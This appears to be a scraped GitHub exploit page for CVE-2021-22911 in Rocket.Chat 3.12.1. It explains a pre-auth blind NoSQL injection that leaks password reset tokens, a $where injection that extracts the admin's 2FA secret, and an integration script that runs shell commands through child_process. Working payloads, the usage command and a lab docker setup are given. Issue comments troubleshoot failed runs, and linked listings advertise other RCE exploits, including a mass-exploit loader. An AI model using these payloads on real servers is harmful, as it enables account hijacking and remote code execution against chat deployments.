Pre-Auth Blind NoSQL Injection leading to Remote Code Execution in Rocket Chat 3.12.1

Related tags

Security related resources CVE-2021-22911
Overview

CVE-2021-22911

Pre-Auth Blind NoSQL Injection leading to Remote Code Execution in Rocket Chat 3.12.1

  • The getPasswordPolicy method is vulnerable to NoSQL injection attacks and does not require authentication/authorization. It can be used to take over accounts by leaking password reset tokens. Taking over an admin account leads to Remote Code Execution.

Explanation

  1. Hijacking user's account ( Unauthenticated )
  • There is NoSQL injection in getPasswordPolicy endpoint in password reset token parameter, which takes json object allowing us to use $regex operator. Which we use to perform blind nosql injection to get reset token.
  1. Privilege Escalation to admin ( Authenticated )
  • So admin user is most likely to be protected by 2fa. So even if we change admin's password through (1) it will prompt for 2fa code on login.
  • users.list api endpoint takes query parameter which is vulnerable to nosql injection. We are also able to retrieve data by throwing an error.
  • We run the following query to get admin's 2fa secret : {"$where":"this.username==='admin'+&&+(()=>{+throw+this.services.totp.secret+})()"}
  • Next we just do (1) to reset admin's password and use the 2fa secret to generate code which we can use to login.
  1. RCE ( Autenticated - Admin )
  • Rocket.Chat has a feature called Integrations that allows creating incoming and outgoing web hooks. These web hooks can have scripts associated with them that are executed when the web hook is triggered.
  • We create a integration with the following script :
const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec('command here');
  • Next we just trigger the webhook to get rce :)

Usage

  • You will need a low priv user's email who has no 2fa setup. ( -u )
  • You will also need to know administrator email. Not a problem if admin is protected with 2fa. ( -a )
python3 exploit.py -u "[email protected]" -a "[email protected]" -t "http://rocket.local"

Environment

  • Tested on Rocket Chat 3.12.1
  • Building your own test environment using docker :
docker run --name db -d mongo:3.6 --smallfiles --replSet rs0 --oplogSize 128
docker exec -ti db mongo --eval "printjson(rs.initiate())"
docker run --name rocketchat -p 80:3000 --link db --env ROOT_URL=http://localhost --env MONGO_OPLOG_URL=mongodb://db:27017/local -d rocket.chat:3.12.1

Credits

Exploit-db

  • Coming soon
You might also like...
Scan all java processes on your host to check weather it's affected by log4j2 remote code execution

Log4j2 Vulnerability Local Scanner (CVE-2021-45046) Log4j 漏洞本地检测脚本,扫描主机上所有java进程,检测是否引入了有漏洞的log4j-core jar包,是否可能遭到远程代码执行攻击(CVE-2021-45046)。上传扫描报告到指定的服

null 86 Dec 9, 2022
Exploiting CVE-2021-44228 in Unifi Network Application for remote code execution and more

Log4jUnifi Exploiting CVE-2021-44228 in Unifi Network Application for remote cod

null 96 Jan 2, 2023
Exploiting CVE-2021-44228 in VMWare Horizon for remote code execution and more.

Log4jHorizon Exploiting CVE-2021-44228 in VMWare Horizon for remote code execution and more. BLOG COMING SOON Code and README.md this time around are

null 96 Dec 14, 2022
HTTP Protocol Stack Remote Code Execution Vulnerability CVE-2022-21907

CVE-2022-21907 Description POC for CVE-2022-21907: HTTP Protocol Stack Remote Code Execution Vulnerability. create by antx at 2022-01-17. Detail HTTP

赛欧思网络安全研究实验室 365 Nov 30, 2022
Unsafe Twig processing of static pages leading to RCE in Grav CMS 1.7.10

CVE-2021-29440 Unsafe Twig processing of static pages leading to RCE in Grav CMS 1.7.10 Grav is a file based Web-platform. Twig processing of static p

Enox 6 Oct 10, 2022
Übersicht remote command execution 0day exploit
Übersicht remote command execution 0day exploit

Übersicht RCE 0day Unauthenticated remote command execution 0day exploit for Übersicht. Description Übersicht is a desktop widget application for m

BoofGang 10 Dec 21, 2021
On the 11/11/21 the apache 2.4.49-2.4.50 remote command execution POC has been published online and this is a loader so that you can mass exploit servers using this.
On the 11/11/21 the apache 2.4.49-2.4.50 remote command execution POC has been published online and this is a loader so that you can mass exploit servers using this.

ApacheRCE ApacheRCE is a small little python script that will allow you to input the apache version 2.4.49-2.4.50 and then input a list of ip addresse

null 3 Dec 4, 2022
ProxyLogon Pre-Auth SSRF To Arbitrary File Write

ProxyLogon Pre-Auth SSRF To Arbitrary File Write For Education and Research Usage: C:\python proxylogon.py mail.evil.corp [email protected] At

lulz 117 Nov 28, 2022
Exploit grafana Pre-Auth LFI

Grafana-LFI-8.x Exploit grafana Pre-Auth LFI How to use python3

null 2 Jul 25, 2022
Comments
  • is section Environment complete?

    is section Environment complete?

    I tried to check your exploit.

    As said in Environment section of Readme, builded test environment with

    docker run --name db -d mongo:3.6 --smallfiles --replSet rs0 --oplogSize 128
docker exec -ti db mongo --eval "printjson(rs.initiate())"
docker run --name rocketchat -p 80:3000 --link db --env ROOT_URL=http://localhost --env MONGO_OPLOG_URL=mongodb://db:27017/local -d rocket.chat:3.12.1

    after that, execute script as

    python3 exploit.py -u "[email protected]" -a "[email protected]" -t "http://localhost:80"

    script ended with

    [+] Resetting [email protected] password
[+] Password Reset Email Sent
Got: U
Got: UN
Got: UNU
Got: UNUg
Got: UNUg2
Got: UNUg2f
Got: UNUg2fJ
Got: UNUg2fJ-
Got: UNUg2fJ-I
Got: UNUg2fJ-IE
Got: UNUg2fJ-IE6
Got: UNUg2fJ-IE6P
Got: UNUg2fJ-IE6Pt
Got: UNUg2fJ-IE6Ptc
Got: UNUg2fJ-IE6Ptco
Got: UNUg2fJ-IE6PtcoK
Got: UNUg2fJ-IE6PtcoKd
Got: UNUg2fJ-IE6PtcoKdN
Got: UNUg2fJ-IE6PtcoKdNP
Got: UNUg2fJ-IE6PtcoKdNPm
Got: UNUg2fJ-IE6PtcoKdNPmg
Got: UNUg2fJ-IE6PtcoKdNPmg1
Got: UNUg2fJ-IE6PtcoKdNPmg1K
Got: UNUg2fJ-IE6PtcoKdNPmg1Kv
Got: UNUg2fJ-IE6PtcoKdNPmg1Kvl
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlX
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXw
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-c
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ce
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ceY
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ceYN
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ceYNU
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ceYNUy
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ceYNUyG
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ceYNUyGf
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ceYNUyGfR
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ceYNUyGfRJ
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ceYNUyGfRJL
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ceYNUyGfRJLI
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ceYNUyGfRJLIr
Got: UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ceYNUyGfRJLIr7
[+] Got token : UNUg2fJ-IE6PtcoKdNPmg1KvlXwE-ceYNUyGfRJLIr7
[-] Wrong token

    Do I understand correctly that the problem is that I didn't fill the Rocket Chat database with users?

    Сould you add the necessary comments to the Environment section to fully recreate the exploitation?

    p.s. i'm sorry for being dummy xd

    p.p.s. and great work btw

    opened by RegularITCat 2
  • For RocketChat v3.2.2: Class

    For RocketChat v3.2.2: Class "Script" not in Trigger rce

    Here is the response I get from the terminal after running the exploit:

    {"success":false}

    The integration appears in the integrations list in my admin panel.

    This appears in the admin log:

    server.js:204 Integrations ➔ Incoming WebHook.error [Class "Script" not in Trigger rce ]

    Is there a way to get this working for earlier versions of RocketChat? (I tried connecting over Discord as well.)

    opened by MisterVermont13 1
  • binascii.Error: Non-base32 digit found

    binascii.Error: Non-base32 digit found

    Trying to run this POC in a test environment with Rocket Chat..and I keep running into the issue below when the script receives the password reset token for the admin account

    [+] Got token : j3ldATrC6nBzTVg4rr_JAgDGCta36nt8fFIF6-wxHYX Traceback (most recent call last): File "/Tools/CVE-2021-22911/exploit.py", line 155, in code = oathtool.generate_otp(secret) File "/usr/local/lib/python3.9/dist-packages/oathtool/init.py", line 59, in generate_otp key = base64.b32decode(pad(clean(key)), casefold=True) File "/usr/lib/python3.9/base64.py", line 231, in b32decode raise binascii.Error('Non-base32 digit found') from None binascii.Error: Non-base32 digit found

    Is there something I'm missing, or not understanding with this error? Or is there an issue with the exploit code?

    opened by ashishgajjar90 3
Owner
Enox
My discord : Enox#4458
Enox
GitHub
POC of CVE-2021-26084, which is Atlassian Confluence Server OGNL Pre-Auth RCE Injection Vulneralibity.

CVE-2021-26084 Description POC of CVE-2021-26084, which is Atlassian Confluence Server OGNL(Object-Graph Navigation Language) Pre-Auth RCE Injection V

antx 9 Aug 31, 2022
A blind SQL injection script that uses binary search aka bisection method to dump datas from database.

Blind SQL Injection I wrote this script to solve PortSwigger Web Security Academy's particular Blind SQL injection with conditional responses lab. Bec

Şefik Efe 2 Oct 29, 2022
command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validation, attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands.

CVE-2021-36260 CVE-2021-36260 POC command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validatio

Aiminsun 165 Dec 21, 2022
MongoDB-Injection - This challenge-script is custom-made for web-server running MongoDB which is vulnerable to No-SQL injection

MongoDB-Injection Cheesy Multi-threaded script for NoSQL Injection This challeng

Caretaker 2 Jun 6, 2022
Gitlab RCE - Remote Code Execution

Gitlab RCE - Remote Code Execution RCE for old gitlab version <= 11.4.7 & 12.4.0-12.8.1 LFI for old gitlab versions 10.4 - 12.8.1 This is an exploit f

null 153 Nov 9, 2022
Strapi Framework Vulnerable to Remote Code Execution

CVE-2019-19609 Strapi Framework Vulnerable to Remote Code Execution well, I didnt found any exploit for CVE-2019-19609 so I wrote one. :/ Usage pytho

Dasith Vidanage 7 Mar 8, 2022
A Python replicated exploit for Webmin 1.580 /file/show.cgi Remote Code Execution

CVE-2012-2982 John Hammond | September 4th, 2021 Checking searchsploit for Webmin 1.580 I only saw a Metasploit module for the /file/show.cgi Remote C

John Hammond 25 Dec 8, 2022
CVE-2021-26084 Remote Code Execution on Confluence Servers

CVE-2021-26084 CVE-2021-26084 Remote Code Execution on Confluence Servers. Dork Fofa: app="ATLASSIAN-Confluence" Usage Show help information. python P

FQ Hsu 63 Dec 30, 2022
Exploit for GitLab CVE-2021-22205 Unauthenticated Remote Code Execution

Vuln Impact An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files tha

Hendrik Agung 2 Dec 30, 2021
Exploiting CVE-2021-44228 in vCenter for remote code execution and more

Log4jCenter Exploiting CVE-2021-44228 in vCenter for remote code execution and more. Blog post detailing exploitation linked below: COMING SOON Why? P

null 81 Dec 20, 2022